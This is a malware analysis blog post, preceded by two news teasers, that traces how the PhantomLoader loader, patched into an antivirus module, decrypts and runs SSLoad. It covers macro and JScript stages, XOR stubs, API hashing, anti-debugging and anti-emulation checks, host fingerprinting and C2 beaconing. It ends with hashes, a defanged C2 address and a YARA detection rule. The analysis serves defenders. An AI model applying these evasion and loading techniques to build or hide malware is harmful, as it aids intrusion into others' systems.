Proactively identify and phase out end-of-life products to minimize risk exposure. Organizations should prioritize timely upgrades or replacements for critical systems.

The post CISA Flags Multiple Critical Vulnerabilities Exposed Across Major Platforms appeared first on Cyble.

Blog – Cyble – ​Read More

Mind the (air) gap: GoldenJackal gooses government guardrails

ESET Research analyzed two separate toolsets for breaching air-gapped systems, used by a cyberespionage threat actor known as GoldenJackal

WeLiveSecurity – ​Read More

New PhantomLoader Malware Distributes SSLoad: Technical Analysis

Editor’s note: The current article is authored by Mohamed Talaat, a cybersecurity researcher and malware analyst. You can find Mohamed on X and LinkedIn.

In this malware analysis report, we take an in-depth look at how an undocumented loader called PhantomLoader has been used by attackers to distribute a rust-based malware known as SSLoad.

Overview

The PhantomLoader usually masquerades as a legitimate 32-bit DLL written in C/C++ for an antivirus software called 360 Security Total.

However, in this case, it was found disguising itself as “PatchUp.exe,” which is still a legitimate module of 360 Total Security. This loader has been used in recent attacks to deliver a new rust-based malware called SSLoad.

What makes PhantomLoader unique is that it was added to be part of a legitimate DLL or executable of a well-known software by binary patching the DLL or executable and adding a self-modifying technique. The latter decrypts an embedded code stub, which then decrypts and loads “SSLoad” into memory.

PatchUp.exe and legitimate module of 360 Total Security

Technical analysis

After analyzing the SSLoad sample in ANY.RUN’s sandbox, we observed that one distribution method for this malware involves phishing emails containing malicious Office documents. These documents initiate the infection chain.

The analysis session shows how the drop and execution of PhantomLoader occurs, after which it decrypts and runs SSLoad.

View the analysis session

The detection of SSLoad malware inside ANY.RUN’s sandbox

Execution of Malicious Word document

After executing the malicious Word document, it became clear that a new process, “app.com,” was launched by “WINWORD.exe,” indicating that an embedded malicious macro had been executed. This resulted in the creation of the suspicious process. 

Malicious Word document displayed in ANY.RUN’s sandbox

To better understand the infection chain, the macro was extracted and analyzed further.

Analyze malware and phishing threats
in ANY.RUN’s Interactive Sandbox 



Try it now


Execution of Decoded XML String

In the ANY.RUN Script Tracer, it was observed that the malware loads an encoded XML string, which appears to be obfuscated using JScript. This encoding is used to disguise the malicious intent, making it more difficult to detect. 

Once loaded, the XML string is executed, triggering the next stage in the malware’s infection process.

XML String load and execution demonstrated in ANY.RUN’s sandbox

Upon further investigation of the document’s macros, an Autoclose macro was found that reads an XML string from an XML file named “UserForm1.”

Autoclose macro that reads XML string

After analyzing the referenced form file, it became clear that the loaded XML string is encoded in JavaScript. This encoding serves as a protection measure designed by Microsoft to prevent unauthorized copying or alteration of VBScript or JavaScript code.

Javascript encoded as XML string

Using CyberChef, the JavaScript was decoded, revealing the underlying code used by the malware to continue the infection process. This provides clear insights into the next steps of the attack.

Decoding process of Javascript with CyberChef

The JavaScript code decodes the next stage, PhantomLoader, using base64. It then places the decoded file in the user’s %TEMP% directory with the name “app.com” and starts it. 

Decoding of the next stage using Base64 

First Loader: PhantomLoader

PhantomLoader disguises itself as a legitimate DLL module for the antivirus software 360 Total Security. This tactic allows it to remain undetected by both the system and users.

360 Total Security damaged by PhantomLoader

This is one of the rare cases where the malicious code runs before the main function is reached. This strongly suggests that the legitimate DLL module has been modified. A malicious routine is inserted before the main function, along with an encrypted stub. 

Display of malicious subroutine

The malicious routine embedded within the DLL module first calculates the address of the encrypted code stub, which is hidden within the file. It then decrypts this stub using a XOR operation with a hardcoded key.

The encrypted code is located in the .text section of the DLL. It was disassembled by IDA, but the disassembled output appeared nonsensical, indicating that the code is indeed encrypted.

XOR decryption loop and encrypted code stub

To further analyze the encrypted code in IDA, an IDAPython script was created to decrypt and patch the code in place.

Implementation of IDAPython script

The decrypted code stub begins by fetching the base address of “kernel32”, a core Windows system DLL that provides essential system functions. It then uses this base address to resolve the following function addresses by hash:

VirtualAlloc – Responsible for memory allocation.

LoadLibraryA – Loads libraries (DLLs) into memory.

GetProcAddress – Retrieves the address of functions or variables from the loaded DLLs.

Function addresses resolved by hash

The resolved functions are then used to load the decrypted next-stage loader, SSLoad, directly into memory.

Using the same key as before, it XOR decrypts the encrypted SSLoad, which is stored in the “.rsrc” section of the DLL. This method keeps the actual payload concealed within the DLL until it’s ready to be executed.

XOR decryption loop of encrypted SSLoad stored in .rsrc

Interestingly, it doesn’t use the common API sequence FindResourceA and LockResource to locate and extract the encrypted resource. Instead, an offset to the encrypted resource is passed to the function that points to the decrypted stub.

Encrypted SSLoad

Second Loader: SSLoad

The final payload decrypted by PhantomLoader is SSLoad, a rust-based loader known for its evasive and stealthy nature.

It employs various anti-analysis techniques, including anti-debugging and anti-emulation methods. SSLoad also uses multiple layers of string decryption to conceal its Command-and-Control (C2) URLs and IP addresses, making detection and analysis more challenging.

When executed, SSLoad begins by creating a mutex object with a hardcoded name. This object ensures that only one instance of SSLoad can run on the host at any given time. This is a common technique used to avoid resource conflicts or redundant infections on a single host.

Mutex object created to ensure only one instance of SSLoad

It uses a common anti-debugging technique by inspecting the Process Environment Block (PEB), specifically looking for the “BeingDebugged” flag. This flag is set to indicate whether the process is currently being debugged. 

Anti-debugging technique inspection

It is interesting to note that it uses an anti-emulation technique that was observed for the first time being used by Raspberry Robin. The technique involves attempting to retrieve the address of a function exported by kernel32 called “MpVmp32Entry”. 

However, when inspecting the exports of kernel32 for this function name, it cannot be found. This is because only modified versions of kernel32.dll used by emulators export that function.

MpVmp32Entry called by kernel32

The developers of SSLoad may have either intentionally or accidentally failed to properly decrypt the library name Kernel32.dll. This would result in the DLL base address not being retrieved to check for the target export. As a result, the implemented trick might fail even on an emulated system.

One of the system artifacts to check for is the presence of a directory with a randomly generated name under %APPDATA%/Microsoft. This directory name is generated at runtime using the function SystemFunction036 from the Advapi32.dll library, which is often used for cryptographic functions.

Directory name generated with SystemFunction036 function

After completing its checks and decrypting the C2 URLs and IP addresses, SSLoad moves forward with fingerprinting the host it’s running on. This process involves collecting various details about the system.

This data is then stored in a JSON object, which will be sent later via POST request to the Command-and-Control (C2) server for further communication.

Fingerprinting process of the host

The fingerprinted data collected by SSLoad includes crucial system information like the OS version, username, hostname, architecture (arch), public IP address, and other system-specific details.

The data will be sent to the server in preparation of C2 communication process. 

Learn to analyze malware

See detailed guide to advanced malware and phishing analysis with ANY.RUN’s Interactive Sandbox.

Investigate any threat with ease.



If the connection was successful, the C2 server will return back response with a JSON object containing a “key” and an “ID”.

The key and ID displayed in ANY.RUN’s sandbox

The returned key is a base64 encoded RC4 key that will be used to secure further communication between the host and C2 server. 

In its turn, the ID is a unique identifier generated on the C2 side that will be used by the infected host to authenticate and identify itself to the C2 server. 

In the later HTTP POST requests, no data is sent to the C2 server. Instead, the infected host sends empty HTTP POST requests that contain only the server-side generated “ID”.

HTTP POST requests inside ANY.RUN’s sandbox

Once SSLoad establishes a connection with the C2 server, it enters a beaconing loop, regularly checking in with the server for further instructions or tasks to execute.

It seems that for the current sample the server hasn’t returned any tasks to the infected host. However, in another SSLoad analysis sample, the server did return a response containing an “ID” and a “Job”.

Server response containing ID and Job inside ANY.RUN’s sandbox

The “ID” returned by the server identifies a task for the infected host.

The encoded structure contains two fields: “command” and “arguments.” Fishbein explained that when the “command” field is set to “exe” and the “arguments” field contains a URL, it indicates that the server is instructing the infected host to download and execute the next-stage malware payload from the given URL.

Indicators of Compromise (IOC)

File Paths and Names 

Incident_Harassment.doc

%TEMP%/app.com

File Hashes (MD5)

EC7E26A81B6002C53854A1769AD427A6

bd3231011448b2d6a335032d11c12cad

E01DDD72BC81781FE86A68D3AD045548

Related Domains, URLs, and IP addresses 

http://85[.]239[.]53[.]219 

YARA Rule

rule crime_phantom_loader_dll

{
    meta:
        description = “Detects PhantomLoader C/C++ DLL”
        author = “Mohamed Talaat”
        date = “2024-17-8”
        type = “crimeware”
        hash1 = “BD3231011448B2D6A335032D11C12CAD”
        hash2 = “CA303668B5420C022EF9C78CE1F2BFB7”
        hash3 = “1D8D71B4A0870C0DFA3468470FB28A28”
        hash4 = “B28A478EB5B99EFCDC7CAF428BFFB89A”
    strings:
        $pdb_str = “C:\vmagent_new\bin\joblist” ascii
        $iobit_str = “IUForceDelete123” ascii wide
        $mov_5F5E100 = { ( BF | 68 | C7 45 ?? ) 00 E1 F5 05 }
        $payload_size = { ( D0 | 6C ) 07 00 00 }
        $call_payload = { FF 55 ?? 68 [4] FF [-] 33 C0 ?? 8B E5 5D C3 }
    condition:
        (uint16(0) == 0x5A4D) and
        all of ($mov_5F5E100, $payload_size, $call_payload) and
        any of ($pdb_str, $iobit_str)
}

The post New PhantomLoader Malware Distributes SSLoad: Technical Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More